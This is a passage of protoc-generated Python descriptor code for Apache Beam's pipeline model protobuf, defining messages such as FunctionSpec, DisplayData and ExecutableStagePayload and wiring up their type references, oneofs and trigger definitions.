has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11793,
serialized_end=11897,
)
_FUNCTIONSPEC = _descriptor.Descriptor(
name='FunctionSpec',
full_name='org.apache.beam.model.pipeline.v1.FunctionSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='urn', full_name='org.apache.beam.model.pipeline.v1.FunctionSpec.urn', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='payload', full_name='org.apache.beam.model.pipeline.v1.FunctionSpec.payload', index=1,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11899,
serialized_end=11943,
)
_DISPLAYDATA_IDENTIFIER = _descriptor.Descriptor(
name='Identifier',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='transform_urn', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.transform_urn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.key', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12029,
serialized_end=12099,
)
_DISPLAYDATA_ITEM = _descriptor.Descriptor(
name='Item',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.value', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='short_value', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.short_value', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='label', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.label', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='link_url', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.link_url', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12102,
serialized_end=12364,
)
_DISPLAYDATA_TYPE = _descriptor.Descriptor(
name='Type',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Type',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_DISPLAYDATA_TYPE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12366,
serialized_end=12491,
)
_DISPLAYDATA = _descriptor.Descriptor(
name='DisplayData',
full_name='org.apache.beam.model.pipeline.v1.DisplayData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='items', full_name='org.apache.beam.model.pipeline.v1.DisplayData.items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_DISPLAYDATA_IDENTIFIER, _DISPLAYDATA_ITEM, _DISPLAYDATA_TYPE, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11946,
serialized_end=12491,
)
_MESSAGEWITHCOMPONENTS = _descriptor.Descriptor(
name='MessageWithComponents',
full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.components', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coder', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.coder', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combine_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.combine_payload', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sdk_function_spec', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.sdk_function_spec', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='par_do_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.par_do_payload', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ptransform', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.ptransform', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pcollection', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.pcollection', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='read_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.read_payload', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_input', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.side_input', index=8,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_into_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.window_into_payload', index=9,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategy', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.windowing_strategy', index=10,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='function_spec', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.function_spec', index=11,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='root', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.root',
index=0, containing_type=None, fields=[]),
],
serialized_start=12494,
serialized_end=13408,
)
_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID = _descriptor.Descriptor(
name='SideInputId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13892,
serialized_end=13947,
)
_EXECUTABLESTAGEPAYLOAD_USERSTATEID = _descriptor.Descriptor(
name='UserStateId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13949,
serialized_end=14004,
)
_EXECUTABLESTAGEPAYLOAD_TIMERID = _descriptor.Descriptor(
name='TimerId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=14006,
serialized_end=14057,
)
_EXECUTABLESTAGEPAYLOAD = _descriptor.Descriptor(
name='ExecutableStagePayload',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='environment', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.environment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='input', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.input', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.side_inputs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='transforms', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.transforms', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='outputs', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.outputs', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.components', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_states', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.user_states', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timers', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.timers', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID, _EXECUTABLESTAGEPAYLOAD_USERSTATEID, _EXECUTABLESTAGEPAYLOAD_TIMERID, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13411,
serialized_end=14057,
)
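# Editor's note (added comment, not part of the protoc output): the statements
# below are the cross-reference wiring that protoc emits after all Descriptor
# objects above are constructed. They resolve the message_type / enum_type /
# containing_type references that were declared as None in the
# FieldDescriptor definitions, and register nested types with their parents.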
_BEAMCONSTANTS_CONSTANTS.containing_type = _BEAMCONSTANTS
_COMPONENTS_TRANSFORMSENTRY.fields_by_name['value'].message_type = _PTRANSFORM
_COMPONENTS_TRANSFORMSENTRY.containing_type = _COMPONENTS
_COMPONENTS_PCOLLECTIONSENTRY.fields_by_name['value'].message_type = _PCOLLECTION
_COMPONENTS_PCOLLECTIONSENTRY.containing_type = _COMPONENTS
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.fields_by_name['value'].message_type = _WINDOWINGSTRATEGY
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.containing_type = _COMPONENTS
_COMPONENTS_CODERSENTRY.fields_by_name['value'].message_type = _CODER
_COMPONENTS_CODERSENTRY.containing_type = _COMPONENTS
_COMPONENTS_ENVIRONMENTSENTRY.fields_by_name['value'].message_type = _ENVIRONMENT
_COMPONENTS_ENVIRONMENTSENTRY.containing_type = _COMPONENTS
_COMPONENTS.fields_by_name['transforms'].message_type = _COMPONENTS_TRANSFORMSENTRY
_COMPONENTS.fields_by_name['pcollections'].message_type = _COMPONENTS_PCOLLECTIONSENTRY
_COMPONENTS.fields_by_name['windowing_strategies'].message_type = _COMPONENTS_WINDOWINGSTRATEGIESENTRY
_COMPONENTS.fields_by_name['coders'].message_type = _COMPONENTS_CODERSENTRY
_COMPONENTS.fields_by_name['environments'].message_type = _COMPONENTS_ENVIRONMENTSENTRY
_PIPELINE.fields_by_name['components'].message_type = _COMPONENTS
_PIPELINE.fields_by_name['display_data'].message_type = _DISPLAYDATA
_PTRANSFORM_INPUTSENTRY.containing_type = _PTRANSFORM
_PTRANSFORM_OUTPUTSENTRY.containing_type = _PTRANSFORM
_PTRANSFORM.fields_by_name['spec'].message_type = _FUNCTIONSPEC
_PTRANSFORM.fields_by_name['inputs'].message_type = _PTRANSFORM_INPUTSENTRY
_PTRANSFORM.fields_by_name['outputs'].message_type = _PTRANSFORM_OUTPUTSENTRY
_PTRANSFORM.fields_by_name['display_data'].message_type = _DISPLAYDATA
_STANDARDPTRANSFORMS_PRIMITIVES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_COMPOSITES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.containing_type = _STANDARDPTRANSFORMS
_STANDARDSIDEINPUTTYPES_ENUM.containing_type = _STANDARDSIDEINPUTTYPES
_PCOLLECTION.fields_by_name['is_bounded'].enum_type = _ISBOUNDED_ENUM
_PCOLLECTION.fields_by_name['display_data'].message_type = _DISPLAYDATA
_PARDOPAYLOAD_SIDEINPUTSENTRY.fields_by_name['value'].message_type = _SIDEINPUT
_PARDOPAYLOAD_SIDEINPUTSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD_STATESPECSENTRY.fields_by_name['value'].message_type = _STATESPEC
_PARDOPAYLOAD_STATESPECSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD_TIMERSPECSENTRY.fields_by_name['value'].message_type = _TIMERSPEC
_PARDOPAYLOAD_TIMERSPECSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD.fields_by_name['do_fn'].message_type = _SDKFUNCTIONSPEC
_PARDOPAYLOAD.fields_by_name['parameters'].message_type = _PARAMETER
_PARDOPAYLOAD.fields_by_name['side_inputs'].message_type = _PARDOPAYLOAD_SIDEINPUTSENTRY
_PARDOPAYLOAD.fields_by_name['state_specs'].message_type = _PARDOPAYLOAD_STATESPECSENTRY
_PARDOPAYLOAD.fields_by_name['timer_specs'].message_type = _PARDOPAYLOAD_TIMERSPECSENTRY
_PARAMETER_TYPE.containing_type = _PARAMETER
_PARAMETER_TYPE_ENUM.containing_type = _PARAMETER_TYPE
_PARAMETER.fields_by_name['type'].enum_type = _PARAMETER_TYPE_ENUM
_STATESPEC.fields_by_name['value_spec'].message_type = _VALUESTATESPEC
_STATESPEC.fields_by_name['bag_spec'].message_type = _BAGSTATESPEC
_STATESPEC.fields_by_name['combining_spec'].message_type = _COMBININGSTATESPEC
_STATESPEC.fields_by_name['map_spec'].message_type = _MAPSTATESPEC
_STATESPEC.fields_by_name['set_spec'].message_type = _SETSTATESPEC
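# Editor's note (added comment): the repeated append/containing_oneof pairs
# below register each StateSpec field as a member of the 'spec' oneof; the
# same pattern is used later for TestStreamPayload.Event and Trigger.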
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['value_spec'])
_STATESPEC.fields_by_name['value_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['bag_spec'])
_STATESPEC.fields_by_name['bag_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['combining_spec'])
_STATESPEC.fields_by_name['combining_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['map_spec'])
_STATESPEC.fields_by_name['map_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['set_spec'])
_STATESPEC.fields_by_name['set_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_COMBININGSTATESPEC.fields_by_name['combine_fn'].message_type = _SDKFUNCTIONSPEC
_TIMERSPEC.fields_by_name['time_domain'].enum_type = _TIMEDOMAIN_ENUM
_ISBOUNDED_ENUM.containing_type = _ISBOUNDED
_READPAYLOAD.fields_by_name['source'].message_type = _SDKFUNCTIONSPEC
_READPAYLOAD.fields_by_name['is_bounded'].enum_type = _ISBOUNDED_ENUM
_WINDOWINTOPAYLOAD.fields_by_name['window_fn'].message_type = _SDKFUNCTIONSPEC
_COMBINEPAYLOAD.fields_by_name['combine_fn'].message_type = _SDKFUNCTIONSPEC
_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS.fields_by_name['elements'].message_type = _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS
_TESTSTREAMPAYLOAD_EVENT.containing_type = _TESTSTREAMPAYLOAD
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT.containing_type = _TESTSTREAMPAYLOAD
_TESTSTREAMPAYLOAD.fields_by_name['events'].message_type = _TESTSTREAMPAYLOAD_EVENT
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.fields_by_name['value'].message_type = _SIDEINPUT
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.containing_type = _WRITEFILESPAYLOAD
_WRITEFILESPAYLOAD.fields_by_name['sink'].message_type = _SDKFUNCTIONSPEC
_WRITEFILESPAYLOAD.fields_by_name['format_function'].message_type = _SDKFUNCTIONSPEC
_WRITEFILESPAYLOAD.fields_by_name['side_inputs'].message_type = _WRITEFILESPAYLOAD_SIDEINPUTSENTRY
_CODER.fields_by_name['spec'].message_type = _SDKFUNCTIONSPEC
_STANDARDCODERS_ENUM.containing_type = _STANDARDCODERS
_WINDOWINGSTRATEGY.fields_by_name['window_fn'].message_type = _SDKFUNCTIONSPEC
_WINDOWINGSTRATEGY.fields_by_name['merge_status'].enum_type = _MERGESTATUS_ENUM
_WINDOWINGSTRATEGY.fields_by_name['trigger'].message_type = _TRIGGER
_WINDOWINGSTRATEGY.fields_by_name['accumulation_mode'].enum_type = _ACCUMULATIONMODE_ENUM
_WINDOWINGSTRATEGY.fields_by_name['output_time'].enum_type = _OUTPUTTIME_ENUM
_WINDOWINGSTRATEGY.fields_by_name['closing_behavior'].enum_type = _CLOSINGBEHAVIOR_ENUM
_WINDOWINGSTRATEGY.fields_by_name['OnTimeBehavior'].enum_type = _ONTIMEBEHAVIOR_ENUM
_MERGESTATUS_ENUM.containing_type = _MERGESTATUS
_ACCUMULATIONMODE_ENUM.containing_type = _ACCUMULATIONMODE
_CLOSINGBEHAVIOR_ENUM.containing_type = _CLOSINGBEHAVIOR
_ONTIMEBEHAVIOR_ENUM.containing_type = _ONTIMEBEHAVIOR
_OUTPUTTIME_ENUM.containing_type = _OUTPUTTIME
_TIMEDOMAIN_ENUM.containing_type = _TIMEDOMAIN
_TRIGGER_AFTERALL.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTERALL.containing_type = _TRIGGER
_TRIGGER_AFTERANY.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTERANY.containing_type = _TRIGGER
_TRIGGER_AFTEREACH.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTEREACH.containing_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.fields_by_name['early_firings'].message_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.fields_by_name['late_firings'].message_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.containing_type = _TRIGGER
_TRIGGER_AFTERPROCESSINGTIME.fields_by_name['timestamp_transforms'].message_type = _TIMESTAMPTRANSFORM
_TRIGGER_AFTERPROCESSINGTIME.containing_type = _TRIGGER
_TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME.containing_type = _TRIGGER
_TRIGGER_DEFAULT.containing_type = _TRIGGER
_TRIGGER_ELEMENTCOUNT.containing_type = _TRIGGER
_TRIGGER_NEVER.containing_type = _TRIGGER
_TRIGGER_ALWAYS.containing_type = _TRIGGER
_TRIGGER_ORFINALLY.fields_by_name['main'].message_type = _TRIGGER
_TRIGGER_ORFINALLY.fields_by_name['finally'].message_type = _TRIGGER
_TRIGGER_ORFINALLY.containing_type = _TRIGGER
_TRIGGER_REPEAT.fields_by_name['subtrigger'].message_type = _TRIGGER
_TRIGGER_REPEAT.containing_type = _TRIGGER
_TRIGGER.fields_by_name['after_all'].message_type = _TRIGGER_AFTERALL
_TRIGGER.fields_by_name['after_any'].message_type = _TRIGGER_AFTERANY
_TRIGGER.fields_by_name['after_each'].message_type = _TRIGGER_AFTEREACH
_TRIGGER.fields_by_name['after_end_of_window'].message_type = _TRIGGER_AFTERENDOFWINDOW
_TRIGGER.fields_by_name['after_processing_time'].message_type = _TRIGGER_AFTERPROCESSINGTIME
_TRIGGER.fields_by_name['after_synchronized_processing_time'].message_type = _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME
_TRIGGER.fields_by_name['always'].message_type = _TRIGGER_ALWAYS
_TRIGGER.fields_by_name['default'].message_type = _TRIGGER_DEFAULT
_TRIGGER.fields_by_name['element_count'].message_type = _TRIGGER_ELEMENTCOUNT
_TRIGGER.fields_by_name['never'].message_type = _TRIGGER_NEVER
_TRIGGER.fields_by_name['or_finally'].message_type = _TRIGGER_ORFINALLY
_TRIGGER.fields_by_name['repeat'].message_type = _TRIGGER_REPEAT
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_all'])
_TRIGGER.fields_by_name['after_all'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_any'])
_TRIGGER.fields_by_name['after_any'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_each'])
_TRIGGER.fields_by_name['after_each'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_end_of_window'])
_TRIGGER.fields_by_name['after_end_of_window'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_processing_time'])
_TRIGGER.fields_by_name['after_processing_time'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
